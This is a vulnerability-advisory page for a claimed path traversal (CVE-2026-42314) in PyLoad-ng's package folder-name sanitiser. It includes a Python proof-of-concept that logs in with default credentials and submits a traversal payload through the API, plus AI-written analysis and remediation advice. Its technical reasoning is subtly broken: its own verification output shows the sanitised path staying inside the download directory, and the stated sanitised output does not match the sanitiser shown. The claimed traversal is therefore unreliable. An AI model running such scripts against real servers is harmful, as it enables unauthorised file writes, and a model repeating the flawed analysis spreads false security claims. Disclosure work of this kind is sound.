PyLoad-ng CVE-2026-42314
MEDIUMSeverity by source
AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
Lifecycle Timeline
2DescriptionGitHub Advisory
Insufficient sanitization of package folder names allows writing files outside the intended download directory.
Affected Component
src/pyload/core/api/__init__.py- Function:
add_package()
Description
Package folder names are sanitized using insufficient string replacement:
folder = (
folder.replace("http://", "")
.replace("https://", "")
.replace("../", "_")
# Bypassable!
.replace("..\\", "_")
.replace(":", "")
.replace("/", "_")
.replace("\\", "_")
)The ../ replacement is bypassable. The pattern ....// becomes .._ after replacement (partial removal), leaving .. which can be exploited when the path is later resolved by the OS.
Proof of Concept
Setup
pip install pyload-ng[all]
pyload -d &
# Default credentials: pyload / pyloadExploit
#!/usr/bin/env python3
import requests
BASE_URL = "http://localhost:8000"
USERNAME = "pyload"
PASSWORD = "pyload"
session = requests.Session()
# Login
session.post(f"{BASE_URL}/login", data={
"username": USERNAME,
"password": PASSWORD
})
# Create package with malicious folder name
# The pattern ....// bypasses the ../ replacement
# After sanitization: .._ (still contains ..)
folder_payload = "....//....//....//tmp/evil"
resp = session.post(f"{BASE_URL}/api/add_package", json={
"name": "test_package",
"links": ["http://example.com/file.txt"],
"dest": 1
# Destination.QUEUE
})
package_id = resp.json()
print(f"Created package: {package_id}")
# Set malicious folder name
resp = session.post(f"{BASE_URL}/api/set_package_data", json={
"package_id": package_id,
"data": {"folder": folder_payload}
})
print(f"Set folder payload: {folder_payload}")
print(f"Response: {resp.status_code}")
# When download occurs, files will be written outside download dir
print("[+] When a file is downloaded, it will be written to manipulated path")
print(" The sanitized folder still contains '..' sequences that OS resolves")Verification
Check where files would be written:
import os
download_dir = "/home/user/Downloads"
folder = "....//....//....//tmp/evil"
# Simulate pyLoad's sanitization
sanitized = folder.replace("../", "_").replace("/", "_")
print(f"After pyLoad sanitization: {sanitized}")
# Output: .._.._.._tmp_evil
# When pyLoad does os.path.join and then opens the file:
final_path = os.path.join(download_dir, sanitized)
print(f"Joined path: {final_path}")
# Output: /home/user/Downloads/.._.._.._tmp_evil
# The .. sequences remain and could be resolved by OS during file operationsImpact
Authenticated users with ADD permission can:
- Write files outside the download directory
- Potentially overwrite system files (depending on permissions)
- Clutter system directories with downloaded content
AnalysisAI
Path traversal in PyLoad-ng package folder name sanitization allows authenticated users with ADD permission to write files outside the intended download directory via insufficient string replacement logic. The sanitizer replaces ../ with _, but the pattern ....// bypasses this filter by becoming .._ after replacement, leaving exploitable .. sequences that the OS later resolves. CVSS 6.5 (network-accessible, low complexity, requires low-privilege authentication, high integrity impact). Publicly available proof-of-concept code demonstrates exploitation against default credentials.
Technical ContextAI
PyLoad-ng is a Python-based download manager with a REST API exposed on port 8000. The vulnerability exists in src/pyload/core/api/__init__.py within the add_package() function, which performs directory traversal sanitization on user-supplied package folder names using naive string replacement on the folder parameter. The sanitization chain (replacing http://, https://, ../, ..\ , :, /, \) is insufficient because it processes patterns sequentially; the ....// input becomes .._ after replacing ../ (removing only the first ../), then becomes .._.._.. after replacing / with _, leaving unescaped .. sequences. When PyLoad subsequently calls os.path.join(download_dir, sanitized_folder) and opens files, the operating system's path resolution interprets these remaining .. sequences as parent directory navigation, enabling arbitrary file write outside the configured download directory. The root cause is CWE-22 (Improper Limitation of a Pathname to a Restricted Directory) - the application trusts that string replacement is sufficient path validation without canonical path comparison.
RemediationAI
Upgrade PyLoad-ng to version 0.5.0b3.dev100 or later, which contains the corrected path sanitization logic. This is the vendor-released fix and should be applied immediately. If immediate upgrade is not feasible, implement the following compensating controls: (1) Restrict network access to the PyLoad API port (8000) using firewall rules, limiting exposure to trusted networks only - this eliminates AV:N but does not prevent local attacks. (2) Enforce strong unique credentials different from the default pyload/pyload and disable API access for accounts not requiring it. (3) Change the PyLoad download directory to a dedicated filesystem partition or subdirectory with restrictive permissions (mode 0700, owned by the pyload process user) to prevent parent directory traversal impact - files written to unexpected locations will still occur but will be confined to the partition. (4) Run PyLoad in a container or chroot jail with restricted filesystem namespace to isolate file writes. Note that none of these workarounds prevent the vulnerability itself; they reduce attack surface or contain damage. Patch application is strongly recommended. Monitor the GitHub advisory and PyPI release notes for additional fixes.
Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t
BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser
pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi
The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph
pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.
In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne
Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301
Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing
Same weakness CWE-22 – Path Traversal
View allSame technique Path Traversal
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-97r3-5w84-r4q8